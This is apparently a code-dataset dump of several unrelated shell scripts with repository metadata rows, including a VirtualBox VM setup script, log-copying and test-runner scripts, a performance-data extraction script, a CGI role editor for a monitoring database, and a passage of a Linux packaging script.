einfo "Command name is ${cmdname}, FULL_COMMAND=${FULL_COMMAND}"
}
(
dorun softspot
)
(
dorun deepspot
)
| true |
4fd13464f316ca70b0da80d30ac369a75ac1b382 | Shell | packetscrub/reverse-fwk | /create-vbox-vm | UTF-8 | 1,507 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# Create VirtualBox VM using an Ubuntu server ISO
# https://www.linuxtechi.com/manage-virtualbox-virtual-machines-command-line/
PROJ_DIR="$(pwd)"
ISO_PATH="$PROJ_DIR/iso"
VM_NAME="reversing-framework"
OS_TYPE="Ubuntu_64"
VBOX_PATH="$PROJ_DIR/$VM_NAME/$VM_NAME.vdi"
# Check if iso exists already, otherwise download it
# This should be replaced with a python script in future for given user file
ISO_FILE="$(find $ISO_PATH -type f -name '*.iso')"
if [ -z $ISO_FILE ]; then
echo "No ISO found, downloading ubuntu-18.04.2 server image"
wget -P $ISO_PATH "http://cdimage.ubuntu.com/releases/18.04/release/ubuntu-18.04.2-server-amd64.iso"
ISO_FILE="ubuntu-18.04.2-server-amd64.iso"
echo "using ISO $(basename $ISO_FILE)"
else
echo "Found ISO $(basename $ISO_FILE)"
fi
# VBox create VM
VBoxManage createvm --name $VM_NAME --ostype $OS_TYPE --register
# need to create network here
VBoxManage modifyvm $VM_NAME --memory 1024
VBoxManage createhd --filename $VBOX_PATH --size 10000 --format VDI
VBoxManage storagectl $VM_NAME --name "SATA Controller" --add sata --controller IntelAhci
VBoxManage storageattach $VM_NAME --storagectl "SATA Controller" --port 0 --device 0 --type hdd --medium $VBOX_PATH
VBoxManage storagectl $VM_NAME --name "IDE Controller" --add ide --controller PIIX4
VBoxManage storageattach $VM_NAME --storagectl "IDE Controller" --port 1 --device 0 --type dvddrive --medium $ISO_FILE
# Start VM
VBoxManage startvm $VM_NAME
| true |
6d17f47f4b26909fd5560b0e0d8a8331e956f649 | Shell | semenovdv/4sem_labs | /da/6lab_debug/wrapper.sh | UTF-8 | 335 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env bash
for test_file in `ls tests/*.t`; do
echo "Execute ${test_file}"
if ! ./6lab < $test_file > last_answer ; then
echo "ERROR"
continue
fi
answer_file="${test_file%.*}"
if ! diff -u "${answer_file}.a" last_answer ; then
echo "Failed"
else
echo "OK"
fi
done | true |
7abd3bbaf20463502580675b53e4177d88db6499 | Shell | fedora-modularity/base-runtime-tools | /misc/savelogs.sh | UTF-8 | 510 | 3.421875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# Copy repodata and the logs of failed package builds from
# ~/results/<build>/results into ~/logs/<build>.
build=$1
# Bug fix: usage/precondition failures now report on stderr and exit
# non-zero (a bare 'exit' returned the preceding echo's status, i.e. 0).
[ -z "$build" ] && { echo "Usage: savelogs.sh <build>" >&2; exit 1; }
[ -d ~/results/"$build" ] || { echo "Build $build doesn't exist!" >&2; exit 1; }
[ -d ~/logs/"$build" ] && { echo "Logs for $build already exist!" >&2; exit 1; }
mkdir ~/logs/"$build"
cd ~/results/"$build"/results || exit 1
cp -R repodata ~/logs/"$build"/
# For each package whose status log mentions "failed", hard-link its
# per-stage logs into the output dir (assumes same filesystem as ~/logs).
for pkg in $(grep -Fl failed *-status.log|sed 's/-status\.log//'); do
  for log in build mock-stderr mock-stdout root state status; do
    [ -f "$pkg-$log.log" ] && ln "$pkg-$log.log" ~/logs/"$build"/
  done
done
| true |
6c7bd3df372e05770ed67b39e0a6ee1855411d79 | Shell | regilo76/pButtonsExtract | /pbreportlib/linux.sh | UTF-8 | 6,578 | 4 | 4 | [] | no_license | while [ "$CountFile" -lt "$NumberFiles" ]
do
echo "File " $((CountFile + 1)) " out of " $NumberFiles;
DateTime=$(echo ${Files[$CountFile]} | awk -F"_" '{print $3 " " substr($4,1,4)}');
echo "**********Verifying date and time:" $DateTime;
InitialTime=`date --date="$DateTime" +"%s"`
Intervals=$(awk '{if($0 ~ /Run over/) {print $0; exit;}}' $1"/"${Files[$CountFile]});
echo $Intervals
NumberLines=$(echo $Intervals | cut -d " " -f 3);
#echo "File contains " $NumberLines " records."
TimeUnit=$(echo $Intervals | cut -d " " -f 7);
IntervalValue=$(echo $Intervals | cut -d " " -f 6);
#echo "running every " $IntervalValue " " $TimeUnit
if [ $TimeUnit == "minutes." ]; then
IntervalValue=$((IntervalValue * 60));
fi
echo "Extracting mgstat data from: " ${Files[$CountFile]}
awk -v mgstat=$MgstatFile -v physicalread=$PhysicalReadFile -v iorequest=$IORequestFile -v globalreference=$GlobalReferenceFile -F"," 'BEGIN{OFS=","}{
if($0 ~ /end_mgstat/) exit;
if(mg_imprime > 0){
if(mg_imprime >= 3){
gsub(/ /, "");
if($6 != 0) print $1"_"$2, $7 >> mgstat;
print $1"_"$2, $6 >> physicalread;
print $1"_"$2, $6 + $(12) + $(14) + $(18) + $(19) >> iorequest;
print $1"_"$2, $3 + $4 >> globalreference;
}
mg_imprime++;
}
if($0 ~ /beg_mgstat/) mg_imprime = 1;
}' $1"/"${Files[$CountFile]};
echo "Extracting vmstat data from:" $1"/"${Files[$CountFile]};
awk -v vm_time=$InitialTime -v runblocked=$RunBlockedFile -v tpfile=$TotalProcessFile -v total_cores=$Cores -v fpfile=$FreePagesFile -v swfile=$SwapFile -v pifile=$PageInFile -v pofile=$PageOutFile -v csfile=$ContextSwitchFile -v ctfile=$CPUTimeFile -v cufile=$CPUUtilizationFile 'BEGIN{OFS=","}{
if($0 ~ /end_vmstat/){
printf "\n";
exit;
}
if(vm_imprime > 0){
if(vm_imprime > 1 && $1 != "") {
printf "\rprocessing vmstat line: %s", vm_imprime;
split($1,vmdate,"/");
rdate = vmdate[1]"/"vmdate[2]"/20"vmdate[3];
print rdate"_"$2, $3, $4 >> runblocked;
total_process = $3 + $4;
print rdate"_"$2, total_process, total_cores >> tpfile;
print rdate"_"$2, $6 >> fpfile;
print rdate"_"$2, $9 >> pifile;
print rdate"_"$2, $(10) >> pofile;
print rdate"_"$2, $(14) >> csfile
print rdate"_"$2, $5 >> swfile;
print rdate"_"$2, $(15), $(16), $(18) >> ctfile
utilization = $(15) + $(16) + $(18)
print rdate"_"$2, utilization >> cufile
}
vm_imprime++;
}
if($0 ~ /beg_vmstat/) vm_imprime = 1;
}' $1"/"${Files[$CountFile]};
echo "Extracting iostat from "$1"/"${Files[$CountFile]};
awk -v initime=$InitialTime -v tm_interval=$IntervalValue -v fcount=$CountFile -v folder=$DataFolder"/"$ServerName 'BEGIN{OFS=","; imprime = 0; disk = 1; count = 0; dcount = 0}{
if(imprime > 0){
if($0 ~ /Back to top/){
printf "\n";
exit;
}
if(disk != 0 && imprime > 5){
if ($0 ~ /avg-cpu/ || $0 ~ /:/){
printf "\nThere are " disk " disk(s). Spliting and formatting data.\n";
disk = 0;
} else {
rddisk[$1] = folder"service_time_"$1;
wtdisk[$1] = folder"wait_"$1;
utdisk[$1] = folder"utilization_"$1;
if (fcount == 0){
print "date_time,avg service time (svctm)" >> rddisk[$1];
print "date_time,avg wait time (await)" >> wtdisk[$1];
print "date_time,utilization (%util)" >> utdisk[$1];
}
disk++;
dcount++;
}
}
if($0 ~ /Device:/) printf"\rProcessing ocorrence: %s", ioline++;
if(imprime > 4 && $1 in rddisk){
tmp = "date -d@" initime " \"+%m/%d/%Y_%H:%M:%S\"";
tmp | getline myepoch
print myepoch, $(11) >> rddisk[$1];
print myepoch, $(12) >> utdisk[$1];
print myepoch, $(10) >> wtdisk[$1];
close(tmp);
count++;
if(count == dcount){
count = 0;
initime = initime + tm_interval;
}
}
imprime++;
}
if($0 ~ /div id=iostat/) imprime = 1;
}' $1"/"${Files[$CountFile]};
gzip $1"/"${Files[$CountFile]};
mv -v $1"/"${Files[$CountFile]}".gz" $ProcessedFolder;
CountFile=$(( CountFile + 1 ));
done
| true |
2886df4b3960c165b0466f5bf1824f4772efe5f3 | Shell | hugme/nac | /nac-ui/cgi-bin/bin/role_edit | UTF-8 | 13,531 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# set some variables
# role_edit: CGI handler for viewing/editing monitoring "roles".
# varset prints the path of an environment file defining sql_query,
# sql_update, $ACTIVITY_LOG, $LOG_DATE, $USERNAME, etc.
. "$(cat varset)"
use_admin_functions
use_base_functions
use_bust_functions
use_date_functions
#echo $QUERY_STRING
# Parse the CGI query string. Repeated DELETE_* parameters accumulate
# into a single pipe-separated list so multiple checkboxes work.
for X in ${QUERY_STRING//&/ }; do
case $X in
SCR=*) SCR=${X#*=};;
DO=*) DO=${X#*=};;
ROLE_ID=*) ROLE_ID=${X#*=};;
DELETE_SRV=*) [[ -z $DELETE_SRV ]] && DELETE_SRV="${X#*=}" || DELETE_SRV="${DELETE_SRV}|${X#*=}";;
# BUG FIX: these two cases previously tested $DELETE_SRV (copy/paste
# error), so DELETE_ESC/DELETE_DEP lists were built incorrectly
# whenever DELETE_SRV parameters were also present in the request.
DELETE_ESC=*) [[ -z $DELETE_ESC ]] && DELETE_ESC="${X#*=}" || DELETE_ESC="${DELETE_ESC}|${X#*=}";;
DELETE_DEP=*) [[ -z $DELETE_DEP ]] && DELETE_DEP="${X#*=}" || DELETE_DEP="${DELETE_DEP}|${X#*=}";;
NEW_SRV=*) NEW_SRV=${X#*=};;
NEW_ESC=*) NEW_ESC=${X#*=};;
NEW_DEP=*) NEW_DEP=${X#*=};;
NEW_HOST_TEMPLATE=*) NEW_HOST_TEMPLATE=${X#*=};;
esac
done
########
## Print the main page (default action, or DO=SHOW): a table of all
## roles with their server and service counts.
[[ -z $DO || $DO == SHOW ]] && {
# we are going to count the number of servers in each role
# BUG FIX: clear the array that is actually used (SERVER_COUNT);
# the old code unset the never-referenced ROLE_ID_COUNT instead.
unset SERVER_COUNT
while IFS="|" read CURR_ID _ ; do
# BUG FIX: the emptiness test was written as "$SERVER_COUNT[CURR_ID]}"
# (missing "${"), which expanded element 0 plus a literal string and
# therefore never incremented an existing counter correctly.
[[ -z ${SERVER_COUNT[CURR_ID]} ]] && SERVER_COUNT[CURR_ID]=1 || SERVER_COUNT[CURR_ID]=$((${SERVER_COUNT[CURR_ID]}+1))
done< <(echo "select r.role_id from role r,servers s where r.role_id=s.role order by role_id;" | sql_query)
# Roles render three per table row; roles with no servers or no
# services get a yellow highlight on the affected cells.
echo "<table border=1 cellspacing=0 cellpadding=2>"
echo "<tr><td>Role Name</td><td>Server<br>Count</td><td>Service<br>Count</td><td></td>"
echo "<td>Role Name</td><td>Server<br>Count</td><td>Service<br>Count</td><td></td>"
echo "<td>Role Name</td><td>Server<br>Count</td><td>Service<br>Count</td></tr>"
i=1
while IFS="|" read ROLE_ID ROLE SERVICES _ ; do
unset CHANGE_COLOR
SERVICE_COUNT=$(echo $SERVICES | wc -w)
[[ -z ${SERVER_COUNT[ROLE_ID]} ]] && { SERVER_COUNT[ROLE_ID]=0 ; CHANGE_COLOR[0]="bgcolor=yellow" ; CHANGE_COLOR[1]="bgcolor=yellow" ; }
[[ $SERVICE_COUNT == 0 ]] && { CHANGE_COLOR[0]="bgcolor=yellow" ; CHANGE_COLOR[2]="bgcolor=yellow"; }
[[ ! -z $ROLE ]] && {
[[ $i == 0 ]] && echo "<tr>"
echo "<td ${CHANGE_COLOR[0]}><a href=\"/cgi-bin/auth.cgi?SCR=$SCR&DO=ROLE&ROLE_ID=$ROLE_ID\">$ROLE</a></td>"
echo "<td ${CHANGE_COLOR[1]}>${SERVER_COUNT[ROLE_ID]}</td>"
echo "<td ${CHANGE_COLOR[2]}>$SERVICE_COUNT</td>"
[[ $i == 1 || $i == 2 ]] && echo "<td bgcolor=#AAAAAA> </td>"
[[ $i == 3 ]] && { echo "</tr>"; i=0; }
i=$(($i+1))
}
done< <(echo "select role_id,name,services from role order by name" | sql_query)
cat << EOF
</table>
<br><br>
<center><a href="/cgi-bin/auth.cgi/?SCR=role_delete">Delete a role</a></center>
EOF
exit 0
}
########
## make updates if requested (DO=UPDATE). Each optional parameter is
## handled independently; $ERROR accumulates any validation failures
## and suppresses the corresponding database write.
[[ $DO == UPDATE ]] && {
# --- remove services from the role -------------------------------
[[ -n "$DELETE_SRV" ]] && {
SRV_FOR_HOST=$(echo "select services from ROLE where role_id='$ROLE_ID';"|sql_query)
NEW_SERVICE_LIST=$SRV_FOR_HOST
while IFS="|" read DEL_SRV ; do
unset CHECK_EXIST
for CHECK_SERVICE in $NEW_SERVICE_LIST ; do [[ $DEL_SRV == $CHECK_SERVICE ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST != YES ]] && ERROR="$ERROR That service does not exist in this role"
[[ -z $ERROR ]] && {
# Rebuild the space-separated list without the deleted id.
unset BUILD_SERV_LIST
for CHECK_SERVICE in $NEW_SERVICE_LIST ; do
[[ ! $DEL_SRV == $CHECK_SERVICE ]] && { [[ -z $BUILD_SERV_LIST ]] && BUILD_SERV_LIST=$CHECK_SERVICE || BUILD_SERV_LIST="$BUILD_SERV_LIST $CHECK_SERVICE"; }
done
NEW_SERVICE_LIST=$BUILD_SERV_LIST
}
done< <(echo $DELETE_SRV| tr "|" "\n")
#[[ ${#NEW_SERVICE_LIST} -lt 2 ]] && ERROR="$ERROR<br>Too many services have been lost. Please contact your monitoring team"
# Sanity guard: refuse deletions that shrink the list by more than 50%.
SRV_CHANGE_AVERAGE=$(echo "scale=10;((${#SRV_FOR_HOST}-${#NEW_SERVICE_LIST})/${#SRV_FOR_HOST})*100" | bc | cut -d "." -f 1)
[[ $SRV_CHANGE_AVERAGE -gt 50 && ${#NEW_SERVICE_LIST} -gt 2 ]] && ERROR="$ERROR<br>You are attempting to make too large of a change. Please contact your monitoring team"
[[ -z $ERROR ]] && {
echo "update role set services='$NEW_SERVICE_LIST' where role_id='$ROLE_ID';"|sql_update
# NOTE(review): $ROLE is not set in this code path; the audit line
# presumably intended the role name — confirm against other screens.
echo "$LOG_DATE $USERNAME MANUAL RM_ROLE_SERVICE $ROLE delete:$(echo $DELETE_SRV| tr "|" " ") ; OLD:$SRV_FOR_HOST NEW:$NEW_SERVICE_LIST " >> $ACTIVITY_LOG
}
}
# --- remove escalations from the role ----------------------------
[[ -n "$DELETE_ESC" ]] && {
ESC_FOR_HOST=$(echo "select escalations from ROLE where role_id='$ROLE_ID';"|sql_query)
NEW_ESC_LIST=$ESC_FOR_HOST
while IFS="|" read DEL_ESC ; do
unset CHECK_EXIST
for CHECK_ESC in $NEW_ESC_LIST ; do [[ $DEL_ESC == $CHECK_ESC ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST != YES ]] && ERROR="$ERROR That escalation does not exist in this role"
[[ -z $ERROR ]] && {
unset BUILD_ESC_LIST
for CHECK_ESC in $NEW_ESC_LIST ; do
[[ ! $DEL_ESC == $CHECK_ESC ]] && { [[ -z $BUILD_ESC_LIST ]] && BUILD_ESC_LIST=$CHECK_ESC || BUILD_ESC_LIST="$BUILD_ESC_LIST $CHECK_ESC"; }
done
NEW_ESC_LIST=$BUILD_ESC_LIST
}
done< <(echo $DELETE_ESC| tr "|" "\n")
[[ ${#NEW_ESC_LIST} -lt 2 ]] && ERROR="$ERROR<br>Too many escalations have been lost. Please contact your monitoring team"
ESC_CHANGE_AVERAGE=$(echo "scale=10;((${#ESC_FOR_HOST}-${#NEW_ESC_LIST})/${#ESC_FOR_HOST})*100" | bc | cut -d "." -f 1)
[[ $ESC_CHANGE_AVERAGE -gt 50 ]] && ERROR="$ERROR<br>You are attempting to make too large of a change. Please contact your monitoring team"
[[ -z $ERROR ]] && {
# BUG FIX: this update had been left as a bare debugging echo (the
# SQL was printed into the CGI output instead of being executed),
# so escalation deletions were never persisted.
echo "update role set escalations='$NEW_ESC_LIST' where role_id='$ROLE_ID';"|sql_update
echo "$LOG_DATE $USERNAME MANUAL RM_ROLE_ESCALATION $ROLE delete:$(echo $DELETE_ESC| tr "|" " ") ; OLD:$ESC_FOR_HOST NEW:$NEW_ESC_LIST " >> $ACTIVITY_LOG
}
}
# --- remove dependencies from the role ---------------------------
[[ -n "$DELETE_DEP" ]] && {
DEP_FOR_HOST=$(echo "select deps from ROLE where role_id='$ROLE_ID';"|sql_query)
NEW_DEP_LIST=$DEP_FOR_HOST
while IFS="|" read DEL_DEP ; do
unset CHECK_EXIST
for CHECK_DEP in $NEW_DEP_LIST ; do [[ $DEL_DEP == $CHECK_DEP ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST != YES ]] && ERROR="$ERROR That dependancy does not exist in this role"
[[ -z $ERROR ]] && {
unset BUILD_DEP_LIST
for CHECK_DEP in $NEW_DEP_LIST ; do
[[ ! $DEL_DEP == $CHECK_DEP ]] && { [[ -z $BUILD_DEP_LIST ]] && BUILD_DEP_LIST=$CHECK_DEP || BUILD_DEP_LIST="$BUILD_DEP_LIST $CHECK_DEP"; }
done
NEW_DEP_LIST=$BUILD_DEP_LIST
}
done< <(echo $DELETE_DEP| tr "|" "\n")
[[ ${#NEW_DEP_LIST} -lt 2 ]] && ERROR="$ERROR<br>Too many dependancies have been lost. Please contact your monitoring team"
DEP_CHANGE_AVERAGE=$(echo "scale=10;((${#DEP_FOR_HOST}-${#NEW_DEP_LIST})/${#DEP_FOR_HOST})*100" | bc | cut -d "." -f 1)
[[ $DEP_CHANGE_AVERAGE -gt 50 ]] && ERROR="$ERROR<br>You are attempting to make too large of a change. Please contact your monitoring team"
[[ -z $ERROR ]] && {
# BUG FIX: same debugging leftover as the escalation branch; run the
# update instead of printing it.
echo "update role set deps='$NEW_DEP_LIST' where role_id='$ROLE_ID';"|sql_update
echo "$LOG_DATE $USERNAME MANUAL RM_ROLE_DEPENDANCY $ROLE delete:$(echo $DELETE_DEP| tr "|" " ") ; OLD:$DEP_FOR_HOST NEW:$NEW_DEP_LIST " >> $ACTIVITY_LOG
}
}
# --- add a service to the role -----------------------------------
[[ -n "$NEW_SRV" ]] && {
NEW_SRV_ID=$(echo "select service_id from services where name='${NEW_SRV//+/ }';"|sql_query)
SRV_FOR_HOST=$(echo "select services from ROLE where role_id='$ROLE_ID';"|sql_query)
unset CHECK_EXIST
for CHECK_SERVICE in $SRV_FOR_HOST ; do [[ $NEW_SRV_ID == $CHECK_SERVICE ]] && CHECK_EXIST=YES; done
# BUG FIX: the duplicate-add error previously read "does not exist",
# the opposite of the condition being reported.
[[ $CHECK_EXIST == YES ]] && ERROR="$ERROR That service already exists in this role"
[[ -z $ERROR ]] && {
NEW_SERVICE_LIST="$SRV_FOR_HOST $NEW_SRV_ID"
echo "update role set services='$NEW_SERVICE_LIST' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_SERVICE $ROLE $NEW_SRV_ID" >> $ACTIVITY_LOG
}
}
# --- add an escalation to the role -------------------------------
[[ -n "$NEW_ESC" ]] && {
NEW_ESC_ID=$(echo "select esc_id from escalations where name='${NEW_ESC//+/ }';"|sql_query)
ESC_FOR_HOST=$(echo "select escalations from ROLE where role_id='$ROLE_ID';"|sql_query)
unset CHECK_EXIST
# BUG FIX: compared against $CHECK_SERVICE (a stale variable from the
# service branch) instead of the loop variable $CHECK_ESC, so the
# duplicate check never worked.
for CHECK_ESC in $ESC_FOR_HOST ; do [[ $NEW_ESC_ID == $CHECK_ESC ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST == YES ]] && ERROR="$ERROR That escalation already exists in this role"
[[ -z $ERROR ]] && {
NEW_ESC_LIST="$ESC_FOR_HOST $NEW_ESC_ID"
echo "update role set escalations='$NEW_ESC_LIST' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_ESC $ROLE $NEW_ESC_ID" >> $ACTIVITY_LOG
}
}
# --- add a dependency to the role --------------------------------
[[ -n "$NEW_DEP" ]] && {
NEW_DEP_ID=$(echo "select dep_id from deps where name='${NEW_DEP//+/ }';"|sql_query)
DEP_FOR_HOST=$(echo "select deps from ROLE where role_id='$ROLE_ID';"|sql_query)
unset CHECK_EXIST
# BUG FIX: same stale-variable comparison as the escalation branch.
for CHECK_DEP in $DEP_FOR_HOST ; do [[ $NEW_DEP_ID == $CHECK_DEP ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST == YES ]] && ERROR="$ERROR That dependancy already exists in this role"
[[ -z $ERROR ]] && {
NEW_DEP_LIST="$DEP_FOR_HOST $NEW_DEP_ID"
echo "update role set DEPS='$NEW_DEP_LIST' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_DEP $ROLE $NEW_DEP_ID" >> $ACTIVITY_LOG
}
}
# --- change the host template ------------------------------------
[[ -n "$NEW_HOST_TEMPLATE" ]] && {
[[ -z $(echo "select host_template_id from host_template where host_template_id='$NEW_HOST_TEMPLATE';" | sql_query) ]] && ERROR="$ERROR <br> That is not a valid host template"
[[ -z $ERROR ]] && {
echo "update role set host_template='$NEW_HOST_TEMPLATE' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_HOST_TEMPLATE $NEW_HOST_TEMPLATE" >> $ACTIVITY_LOG
}
}
# Fall through to the ROLE display so the user sees the result.
DO=ROLE
}
###############################################
## Show the role
# Renders the edit form for one role: host template selector, service /
# escalation / dependency checklists, and the list of member servers.
[[ $DO == ROLE ]] && {
#echo "==$QUERY_STRING==<br>"
# Get the host templates
# Load lookup tables (id -> display name) used by the form below.
while IFS="|" read NUM NAME _ ; do
HT_NAME[$NUM]="$NAME"
done< <(echo "select host_template_id,name from host_template;"|sql_query)
# Get the services
while IFS="|" read NUM NAME DESC USE CC _ ; do
SERVICE_NAME[$NUM]="$NAME"
done< <(echo "select service_id,name,description,use,check_command from services;"|sql_query)
while IFS="|" read NUM NAME _ ; do
ESCALATION_NAME[$NUM]=$NAME
done< <(echo "select esc_id,name from escalations;"|sql_query)
while IFS="|" read NUM NAME _ ; do
DEPENDANCY_NAME[$NUM]=$NAME
done< <(echo "select dep_id,name from deps;"|sql_query)
# NOTE(review): this read reuses HT_NAME as a scalar, clobbering
# element 0 of the HT_NAME array populated above — confirm intended.
IFS="|" read NAME HT_ID HT_NAME SERVICES ESCALATIONS DEPS <<< "$(echo "select R.name,R.host_template,H.name,R.services,R.escalations,R.deps from role R,host_template H where R.role_id='$ROLE_ID' and R.host_template=H.host_template_id;"|sql_query)"
#$(for i in ${!SERVICE_NAME[*]} ; do echo "<option label=\"${SERVICE_NAME[$i]}\" value=\"$i\"></option>";done)
# The entire page is one here-doc; the embedded $( ... ) substitutions
# run in subshells to build table rows and datalist options inline.
cat <<- EOF
<p id=error>$ERROR</p>
<form method=POST action=/cgi-bin/auth.cgi>
<center><b>$NAME</b></center>
<br>
<b>Host Template:</b><select name=NEW_HOST_TEMPLATE>
<option value="$HT_ID">$HT_NAME</option>
$(while IFS="|" read HTP_ID HTP_NAME ; do echo "<option value=\"$HTP_ID\">$HTP_NAME</option>" ; done< <(echo "select host_template_id,name from host_template" |sql_query))
</select>
<br><br><b>Services</b> - (The check box will remove a service)
<dir>
<table border=0 cellspacing=0 cellpadding=5>
$(a=1
for i in $SERVICES; do
[[ $a == 0 ]] && echo "<tr>"
echo "<td><input type=checkbox name=DELETE_SRV value=\"$i\" \\><a href=auth.cgi?SCR=service_edit&DO=SRV&SRV_ID=$i>${SERVICE_NAME[$i]}</a></td>"
[[ $a == 3 ]] && { echo "</tr>"; a=0; }
a=$(($a+1))
done)
</table><br>
Add a new service: <input type=text name=NEW_SRV id=NEW_SRV list="UNUSED_SERVICES">
<datalist id=UNUSED_SERVICES>
$(for i in ${!SERVICE_NAME[*]} ; do echo " <option label=\"${SERVICE_NAME[$i]}\">${SERVICE_NAME[$i]}</option>";done)
</datalist>
</dir>
<br><b>Escalations </b>
<dir>
$(for i in $ESCALATIONS; do echo " <input type=checkbox name=DELETE_ESC value=\"$i\" \\>${ESCALATION_NAME[$i]}<br>" ;done)
<b>Add a new Escalation:</b> <input type=text name=NEW_ESC id=NEW_ESC list="UNUSED_ESC">
<datalist id=UNUSED_ESC>
$(for i in ${!ESCALATION_NAME[*]} ; do echo " <option label=\"${ESCALATION_NAME[$i]}\">${ESCALATION_NAME[$i]}</option>";done)
</datalist>
</dir>
<br><b>Dependencies </b>
<dir>
$(for i in $DEPS; do echo " <input type=checkbox name=DELETE_DEP value=\"$i\" \\>${DEPENDANCY_NAME[$i]}<br>" ;done)
<b>Add a new Dependancy:</b> <input type=text name=NEW_DEP id=NEW_DEP list="UNUSED_DEP">
<datalist id=UNUSED_DEP>
$(for i in ${!DEPENDANCY_NAME[*]} ; do echo " <option label=\"${DEPENDANCY_NAME[$i]}\">${DEPENDANCY_NAME[$i]}</option>";done)
</datalist>
</dir>
<br>
<input type=hidden name=SCR value=$SCR>
<input type=hidden name=DO value=UPDATE>
<input type=hidden name=ROLE_ID value=$ROLE_ID>
<input type=submit value="Update This Role">
</form><br>
<center><b>Role Information</b></center>
servers in this role:
<table border=0 cellspacing=0 cellpadding=5 align=center>
$(a=1
while IFS="|" read SYSTEM SYSTEM_ID STATUS _ ; do
[[ $a == 0 ]] && echo "<tr>"
echo "<td align=center><a href=\"/cgi-bin/auth.cgi/?SCR=host_edit&DO=SERVER&SERVER=$SYSTEM_ID\">$SYSTEM</a>-$STATUS</td>"
[[ $a == 4 ]] && { echo "</tr>"; a=0; }
a=$(($a+1))
done< <(echo "select hostname,server_id,status from servers where role='$ROLE_ID';" |sql_query) )
</table><br>
EOF
}
| true |
5f837582ffed3f314b4f17a29c41fe33395356bc | Shell | random-mud-pie/relevanced | /scripts/packaging/make_linux_package.sh | UTF-8 | 4,391 | 3.71875 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# much of this was copied shamelessly from osquery
set -e
# SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# SOURCE_DIR="$SCRIPT_DIR/../.."
# BUILD_DIR="$SOURCE_DIR/build/linux"
# export PATH="$PATH:/usr/local/bin"
# Resolve every path relative to this script's own directory so the
# packaging works no matter where it is invoked from.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
PROJECT_ROOT="$SCRIPT_DIR/../.."
PROJECT_BUILD_DIR="$PROJECT_ROOT/build"
BUILD_DIR="$PROJECT_BUILD_DIR/deb"
PROJECT_BIN_BUILD_DIR="$PROJECT_ROOT/build/bin"
# Statically linked server binary produced by the main build.
BUILT_SERVER_BINARY="$PROJECT_BIN_BUILD_DIR/src/relevanced_static"
PACKAGE_VERSION="0.9.8"
PACKAGE_ARCH=`uname -m`
# Filled in later by parse_args (-i and -t command-line options).
PACKAGE_ITERATION=""
PACKAGE_TYPE=""
DESCRIPTION="A server for persistent text-similarity models."
PACKAGE_NAME="relevanced"
# A "-" in the version string marks a pre-release/unstable build.
if [[ $PACKAGE_VERSION == *"-"* ]]; then
DESCRIPTION="$DESCRIPTION (unstable/latest version)"
fi
# Note the trailing "."; check_parsed_args appends the deb/rpm extension.
OUTPUT_PKG_PATH="$BUILD_DIR/$PACKAGE_NAME-$PACKAGE_VERSION."
# Config files
INITD_SRC="${SCRIPT_DIR}/etc/init.d/relevanced"
INITD_DST="/etc/init.d/relevanced"
JSON_CONFIG_SRC=${SCRIPT_DIR}/etc/relevanced/relevanced.json
LOGROTATE_CONFIG_SRC=${SCRIPT_DIR}/etc/logrotate.d/relevanced
# Filesystem layout inside the installed package.
RELEVANCED_LOG_DIR="/var/log/relevanced/"
RELEVANCED_VAR_DIR="/var/lib/relevanced"
RELEVANCED_ETC_DIR="/etc/relevanced"
# Scratch area used to stage the install tree before fpm runs.
WORKING_DIR=/tmp/relevanced_packaging
INSTALL_PREFIX=$WORKING_DIR/prefix
# Print an informational status line to stdout, prefixed with "[+]".
log() {
  printf '[+] %s\n' "$1"
}
# Print an error line prefixed with "[!]" and abort with status 1.
fatal() {
  printf '[!] %s\n' "$1"
  exit 1
}
# Print the command-line synopsis and abort (exit 1, via fatal).
function usage() {
  fatal "Usage: $0 -t deb|rpm -i REVISION -d DEPENDENCY_LIST"
}
# Parse command-line options into the PACKAGE_* globals.
#   -t/--type          package type (deb or rpm)
#   -i/--iteration     package iteration/revision number
#   -d/--dependencies  comma-separated dependency list; NOTE: "${@}"
#                      captures ALL remaining arguments, so -d must be
#                      the last option on the command line.
#   -h/--help          print usage and exit
function parse_args() {
while [ "$1" != "" ]; do
case $1 in
-t | --type ) shift
PACKAGE_TYPE=$1
;;
-i | --iteration ) shift
PACKAGE_ITERATION=$1
;;
-d | --dependencies ) shift
PACKAGE_DEPENDENCIES="${@}"
;;
-h | --help ) usage
;;
esac
shift
done
}
# Validate that the required -t and -i options were supplied (aborting
# via usage() otherwise), then finalize OUTPUT_PKG_PATH by appending
# the package type as the file extension.
check_parsed_args() {
  if [[ -z "$PACKAGE_TYPE" || -z "$PACKAGE_ITERATION" ]]; then
    usage
  fi
  OUTPUT_PKG_PATH="${OUTPUT_PKG_PATH}${PACKAGE_TYPE}"
}
# Build the package: stage a clean install tree under $INSTALL_PREFIX,
# copy in the stripped server binary plus init/json/logrotate configs,
# then hand the whole tree to fpm to produce the .deb/.rpm.
function main() {
parse_args $@
check_parsed_args
# Start from a clean slate: wipe the staging area and any old package.
rm -rf $WORKING_DIR
rm -f $OUTPUT_PKG_PATH
mkdir -p $INSTALL_PREFIX
rm -rf $INSTALL_PREFIX/*
mkdir -p $BUILD_DIR
log "copying binaries"
BINARY_INSTALL_DIR="$INSTALL_PREFIX/usr/bin/"
mkdir -p $BINARY_INSTALL_DIR
cp $BUILT_SERVER_BINARY $BINARY_INSTALL_DIR/relevanced
chmod g-w $BINARY_INSTALL_DIR/relevanced
strip $BINARY_INSTALL_DIR/*
# Create the prefix log dir and copy source configs
log "copying configurations"
